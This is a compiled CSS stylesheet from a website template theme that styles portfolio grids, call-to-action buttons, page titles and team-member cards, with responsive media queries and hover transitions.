/* line 92, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
/* line 102, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-special i {
  margin-right: 5px;
}
/* line 106, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-link {
  float: right;
  font-style: italic;
}
/* line 109, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-portfolio-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
/* line 121, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .no-special .g-portfolio-link {
  float: none;
}
/* line 126, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 127, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .no-link .g-portfolio-special {
  float: none;
}
/* line 131, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio .g-bottom-info {
  margin-top: 15px;
}
/* line 134, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 135, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style3 .g-info-container {
  position: absolute;
  visibility: hidden;
  z-index: 9;
  opacity: 0;
  border: 1px solid #ddd;
  border-top: none;
  width: 100%;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
/* line 145, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style3 .g-portfolio-item {
  border: none;
  position: relative;
}
/* line 148, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 149, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style3 .g-portfolio-item:hover .g-info-container {
  visibility: visible;
  opacity: 1;
}
/* line 156, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 157, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-info-container-style2 {
  background: -webkit-linear-gradient( top , rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
/* line 160, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-info-container-style2 a {
  color: #fff;
}
/* line 162, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-info-container-style2 a:hover {
  color: #fff;
  text-decoration: underline;
}
/* line 168, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 169, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 170, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-portfolio-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
/* line 174, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 175, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 176, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.g-portfolio.style4 .g-portfolio-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 185, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 186, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.portfolio-special .g-portfolio-filter {
  text-align: center;
  position: relative;
  top: -50px;
  margin-bottom: 0;
  justify-content: center;
}
/* line 195, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 196, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 197, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.gutter-enabled, .g-flushed .g-portfolio.gutter-enabled {
  padding: 30px;
}
/* line 200, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 201, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.filters-enabled.gutter-enabled, .g-flushed .g-portfolio.filters-enabled.gutter-enabled {
  padding-top: 0;
}
/* line 205, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter, .g-flushed .g-portfolio .g-portfolio-filter {
  border-bottom: 1px solid #f0f0f0;
}
/* line 207, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 0;
  border: none;
  height: 50px;
  width: 100%;
  line-height: 50px;
  font-weight: bold;
  font-size: 1rem;
  border-radius: 0;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    font-size: 0.9rem;
    font-weight: normal;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
@media only all and (max-width: 47.938rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
/* line 235, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav {
  margin-left: -30px;
  margin-right: -30px;
}
/* line 238, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav > * {
  padding-left: 0;
  border-right: 1px solid #f0f0f0;
  -webkit-box-flex: 1;
  -moz-box-flex: 1;
  box-flex: 1;
  -webkit-flex: 1;
  -moz-flex: 1;
  -ms-flex: 1;
  flex: 1;
  text-align: center;
}
/* line 246, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 247, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter {
  margin-bottom: 0;
}
/* line 249, templates/it_sanctum/scss/sanctum/_portfolio.scss */
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav {
  padding: 0 30px;
}
/* line 257, templates/it_sanctum/scss/sanctum/_portfolio.scss */
/* line 258, templates/it_sanctum/scss/sanctum/_portfolio.scss */
.uk-tooltip.g-portfolio-tooltip {
  padding: 6px 12px;
  font-size: 13px;
}
/* line 1, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner {
  padding: 30px;
  border: 1px solid #ddd;
  border-left: 2px solid #4f953b;
  background: #fff;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-cta-button.style1 .g-cta-inner {
    padding: 20px;
  }
}
/* line 11, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
/* line 21, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 22, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
/* line 33, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
/* line 46, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
/* line 49, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
/* line 63, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
/* line 68, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style1 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
/* line 73, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 74, templates/it_sanctum/scss/sanctum/_cta-button.scss */
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
/* line 81, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
/* line 93, templates/it_sanctum/scss/sanctum/_cta-button.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
/* line 105, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
/* line 118, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
/* line 121, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
  background-color: transparent;
  color: #4f953b;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 128, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right .button:hover {
  background-color: #4f953b;
  color: #fff;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
/* line 143, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
/* line 148, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
/* line 1, templates/it_sanctum/scss/sanctum/_page-title.scss */
.g-page-title {
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  .g-page-title {
    margin-bottom: -30px;
  }
}
/* line 6, templates/it_sanctum/scss/sanctum/_page-title.scss */
.g-page-title h3 {
  margin: 0;
}
/* line 9, templates/it_sanctum/scss/sanctum/_page-title.scss */
.g-page-title i {
  display: block;
}
/* line 4, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 14, templates/it_sanctum/scss/sanctum/_our-team.scss */
@media only all and (max-width: 47.938rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-our-team-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_our-team.scss */
@media only all and (max-width: 47.938rem) {
  .g-our-team:not(.gutter-disabled) .g-our-team-item {
    margin-bottom: 1.876rem !important;
  }
}
/* line 32, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.938rem) {
  .g-our-team .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 41, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.938rem) {
  .g-our-team .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 51, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team, .g-our-team-slider, .g-our-team-slideset {
  text-align: center;
}
/* line 53, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 54, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.gutter-disabled .g-our-team-item, .g-our-team-slider.gutter-disabled .g-our-team-item, .g-our-team-slideset.gutter-disabled .g-our-team-item {
  border: none;
}
/* line 57, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.gutter-disabled .uk-slideset, .g-our-team-slider.gutter-disabled .uk-slideset, .g-our-team-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
/* line 59, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 60, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
/* line 66, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-content, .g-our-team-slider .g-content, .g-our-team-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 71, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
  border: 1px solid #ddd;
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
    margin-bottom: 3.126rem;
    width: 100%;
  }
  /* line 77, templates/it_sanctum/scss/sanctum/_our-team.scss */
  .g-our-team .g-our-team-item:last-child, .g-our-team-slider .g-our-team-item:last-child, .g-our-team-slideset .g-our-team-item:last-child {
    margin-bottom: 0;
  }
}
/* line 82, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image, .g-our-team-slider .g-our-team-image, .g-our-team-slideset .g-our-team-image {
  position: relative;
  overflow: hidden;
}
/* line 85, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 86, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel {
  padding: 0;
}
/* line 88, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
  width: 100%;
  display: block;
  padding: 10px;
  border: 1px solid rgba(255, 255, 255, 0.2);
  border-right: none;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
    padding: 10px 5px;
  }
}
/* line 98, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover {
  background: #4f953b;
}
/* line 103, templates/it_sanctum/scss/sanctum/_our-team.scss */
@media only all and (max-width: 47.938rem) {
  .g-our-team .g-our-team-image .g-our-team-social .g-block, .g-our-team-slider .g-our-team-image .g-our-team-social .g-block, .g-our-team-slideset .g-our-team-image .g-our-team-social .g-block {
    -webkit-box-flex: 1;
    -moz-box-flex: 1;
    box-flex: 1;
    -webkit-flex: 1;
    -moz-flex: 1;
    -ms-flex: 1;
    flex: 1;
  }
}
/* line 109, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image img, .g-our-team-slider .g-our-team-image img, .g-our-team-slideset .g-our-team-image img {
  width: 100%;
}
/* line 113, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-info-container, .g-our-team-slider .g-info-container, .g-our-team-slideset .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 117, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team p, .g-our-team-slider p, .g-our-team-slideset p {
  margin: 0;
}
/* line 120, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-name, .g-our-team-slider .g-our-team-name, .g-our-team-slideset .g-our-team-name {
  margin: 0;
}
/* line 122, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-name a, .g-our-team-slider .g-our-team-name a, .g-our-team-slideset .g-our-team-name a {
  color: #282828;
}
/* line 124, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-name a:hover, .g-our-team-slider .g-our-team-name a:hover, .g-our-team-slideset .g-our-team-name a:hover {
  color: #4f953b;
}
/* line 129, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-position, .g-our-team-slider .g-our-team-position, .g-our-team-slideset .g-our-team-position {
  margin-top: 0;
  font-size: 90%;
}
/* line 132, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-position.g-desc-enabled, .g-our-team-slider .g-our-team-position.g-desc-enabled, .g-our-team-slideset .g-our-team-position.g-desc-enabled {
  margin-bottom: 20px;
}
/* line 136, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-desc, .g-our-team-slider .g-our-team-desc, .g-our-team-slideset .g-our-team-desc {
  margin-top: 0.4rem;
}
/* line 139, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 140, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social, .g-our-team-slider.style2 .g-our-team-social, .g-our-team-slideset.style2 .g-our-team-social {
  margin-top: 20px;
}
/* line 142, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
  color: #4e4e4e;
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
    margin-right: 8px;
  }
}
/* line 148, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social a:last-child, .g-our-team-slider.style2 .g-our-team-social a:last-child, .g-our-team-slideset.style2 .g-our-team-social a:last-child {
  margin-right: 0;
}
/* line 151, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social a:hover, .g-our-team-slider.style2 .g-our-team-social a:hover, .g-our-team-slideset.style2 .g-our-team-social a:hover {
  color: #4f953b;
}
/* line 157, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 158, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 159, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.uk-text-left.style1 .g-our-team-social, .g-our-team-slider.uk-text-left.style1 .g-our-team-social, .g-our-team-slideset.uk-text-left.style1 .g-our-team-social {
  text-align: center !important;
}
/* line 164, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 165, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-image, .g-our-team-slider.style3 .g-our-team-image, .g-our-team-slideset.style3 .g-our-team-image {
  padding-bottom: 100px;
}
/* line 168, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-info-container, .g-our-team-slider.style3 .g-info-container, .g-our-team-slideset.style3 .g-info-container {
  position: absolute;
  bottom: 0;
  left: 0;
  right: 0;
  top: auto;
  z-index: 1;
  padding: 23px 30px;
  height: 100px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 178, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-info-container .g-our-team-position, .g-our-team-slider.style3 .g-info-container .g-our-team-position, .g-our-team-slideset.style3 .g-info-container .g-our-team-position {
  margin: 5px 0 0;
}
/* line 182, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container, .g-our-team-slider.style3 .g-hover-container, .g-our-team-slideset.style3 .g-hover-container {
  opacity: 0;
  position: absolute;
  background-color: #111;
  color: #fff;
  top: 100px;
  left: 0;
  bottom: 0;
  right: 0;
  padding: 30px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 193, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container > *, .g-our-team-slider.style3 .g-hover-container > *, .g-our-team-slideset.style3 .g-hover-container > * {
  opacity: 0;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 197, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-desc, .g-our-team-slider.style3 .g-hover-container .g-our-team-desc, .g-our-team-slideset.style3 .g-hover-container .g-our-team-desc {
  font-size: 90%;
}
/* line 200, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-social, .g-our-team-slider.style3 .g-hover-container .g-our-team-social, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social {
  margin-top: 25px;
  font-size: 18px;
}
/* line 203, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
    margin-right: 8px;
  }
}
/* line 208, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a:last-child {
  margin-right: 0;
}
/* line 214, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item, .g-our-team-slider.style3 .g-our-team-item, .g-our-team-slideset.style3 .g-our-team-item {
  position: relative;
}
/* line 216, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 217, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container {
  opacity: 1;
}
/* line 219, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container > * {
  -webkit-transition-delay: 0.3s;
  -moz-transition-delay: 0.3s;
  transition-delay: 0.3s;
  opacity: 1;
}
/* line 224, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container {
  bottom: 100%;
  margin-bottom: -100px;
  background: #4f953b;
  color: #fff;
}
/* line 229, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name {
  color: #fff !important;
}
/* line 231, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a {
  color: #fff !important;
}
/* line 233, templates/it_sanctum/scss/sanctum/_our-team.scss */
